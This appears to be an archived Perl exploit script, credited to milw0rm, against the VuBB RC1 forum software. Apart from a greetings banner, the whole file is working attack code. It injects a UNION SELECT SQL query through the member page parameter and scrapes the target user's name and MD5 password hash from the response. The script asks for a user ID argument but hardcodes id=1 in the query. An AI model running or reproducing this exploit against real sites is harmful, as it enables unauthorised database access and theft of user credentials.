#!/bin/env perl #------------------------------------------------------------# #- VuBB RC1 SQL Injection .. By Devil-00 < devil-00@s4a.cc > #- [!] ==|| This Exploit Only When magic_quotes_gpc Is OFF ||== #- Gr33tz :- #- Abducter .. #- Devil-00 .. SQL Injection F0und3r & Expl0ting - | devil-00@s4a.cc | - #- Security4Arab .. A'Where Home .. WE LOVE S4A FOR EVER :P #- Xion .. #- HACKERS PAL .. #- Yes2Hack .. #- WwW.Sqor.NeT #- WwW.S4a.Cc #- WwW.SecurityGurus.NeT #------------------------------------------------------------# use LWP::Simple; print "\n\n==========================================\n"; print "\n= Exploit for VuBB RC1 "; print "\n= Coded By Devil-00 | devil-00@s4a.cc | "; print "\n= Gr33tz :- "; print "\n= Abducter .. "; print "\n= Devil-00 .. SQL Injection F0und3r & Expl0ting - | devil-00@s4a.cc | - "; print "\n= Security4Arab .. A'Where Home .. WE LOVE S4A FOR EVER :P "; print "\n= Xion .. "; print "\n= HACKERS PAL .. "; print "\n= Yes2Hack .. "; print "\n= WwW.Sqor.NeT "; print "\n= WwW.S4a.Cc "; print "\n= WwW.SecurityGurus.NeT "; print "\n============================================\n\n"; if(!$ARGV[0] or !$ARGV[1]) { print "\n==|| This Exploit Only When magic_quotes_gpc Is OFF ||=="; print "\nUsage:\nperl $0 [Full-Path] [User ID]\n\nExample:\nperl $0 http://vubb.com/forum/ 1\n"; exit(0); } $url = "/index.php?act=member&m=-99%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null,user,null,null,pass,null%20FROM%20members%20WHERE%20id=1/*"; $page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!"; print "[+] Connected to: $ARGV[0]\n"; $page =~ m/Website: (.*?)<\/a>/ && print "[+] User ID is: $1\n"; print "[-] Unable to retrieve User ID\n" if(!$1); $page =~ m/Yahoo: (.*?)
/ && print "[+] MD5 hash of password is: $1\n"; print "[-] Unable to retrieve hash of password\n" if(!$1); # milw0rm.com [2005-11-02]